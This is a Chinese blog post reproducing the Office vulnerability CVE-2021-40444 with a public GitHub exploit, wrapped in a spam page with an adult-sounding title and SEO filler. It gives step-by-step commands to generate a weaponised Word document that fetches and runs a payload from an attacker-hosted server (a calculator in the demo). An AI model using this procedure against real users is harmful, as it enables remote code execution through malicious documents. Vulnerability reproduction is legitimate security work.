欧美精品123_精品露脸国产偷人在视频_日韩美女免费线视频_成人av三级

2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復現(2021年的微博之夜的king和queen是誰)

本文的標題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復現》來源于:由作者:陳鵬羽采編而成,主要講述了項目地址在https://github.com/lo

項目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。

由于此項目必須使用lcab,所以我們先在kail里安裝一下。

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office


021年的word文檔還有漏洞,Office

進入下載后的CVE-2021-40444目錄里,執行:

python3 exploit.py generate test/calc.dll http://<SRV IP>:3333


021年的word文檔還有漏洞,Office

看見“You can execute now the server and then send document.docx to target” 說明就可以了。

然后用python開一個http服務,端口用剛剛設置的3333 或者自己設置的端口號。

sudo python3 exploit.py host 3333


021年的word文檔還有漏洞,Office

把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機中執行。

word打開后,可以看見這里在下載我們kali上的html文件。


021年的word文檔還有漏洞,Office


html又會下載calc.cab 文件執行其中的命令,最后彈出計算器。


021年的word文檔還有漏洞,Office

服務端顯示的結果:


021年的word文檔還有漏洞,Office

021年的word文檔還有漏洞,Office
本文原作者為陳鵬羽,轉載請注明:出處!如該文有不妥之處,請聯系站長刪除,謝謝合作~

原創文章,作者:陳鵬羽,如若轉載,請注明出處:http://www.uuuxu.com/20220512315602.html

主站蜘蛛池模板: 平原县| 彩票| 武义县| 丰顺县| 申扎县| 宜良县| 合水县| 西乌珠穆沁旗| 新巴尔虎左旗| 南靖县| 额敏县| 阿荣旗| 滨海县| 吐鲁番市| 新乐市| 威信县| 武义县| 丹巴县| 鄂托克前旗| 遂昌县| 焦作市| 永登县| 疏附县| 闻喜县| 乌鲁木齐县| 景泰县| 安平县| 图们市| 阿尔山市| 简阳市| 蒲城县| 阳城县| 东源县| 称多县| 彰化市| 元朗区| 日土县| 望谟县| 缙云县| 宁晋县| 和田市|